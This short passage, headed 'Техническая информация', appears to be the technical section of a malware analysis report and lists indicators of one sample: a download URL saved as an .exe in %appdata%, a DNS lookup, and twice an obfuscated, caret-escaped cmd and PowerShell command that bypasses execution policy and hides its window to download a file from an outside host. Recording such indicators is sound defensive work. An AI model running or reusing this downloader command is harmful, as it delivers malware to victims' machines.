Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^owER^SH^e^l^L^.^e^xE -^E^XeCU^T^iOnpO^LiCy^ by^pAS^S -noproF^IL^e -WINDoW^ST^YLe ^h^IdDEN ^(^Ne^w-^ob^JECt SY^s^TEM^.nET.^we^bCLiEnT).Do^WNl^OadFI^lE('http://transporingsytw.wa...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /c "P^owER^SH^e^l^L^.^e^xE -^E^XeCU^T^iOnpO^LiCy^ by^pAS^S -noproF^IL^e -WINDoW^ST^YLe ^h^IdDEN ^(^Ne^w-^ob^JECt SY^s^TEM^.nET.^we^bCLiEnT).Do^WNl^OadFI^lE('http://transporingsytw.wa...' (со скрытым окном)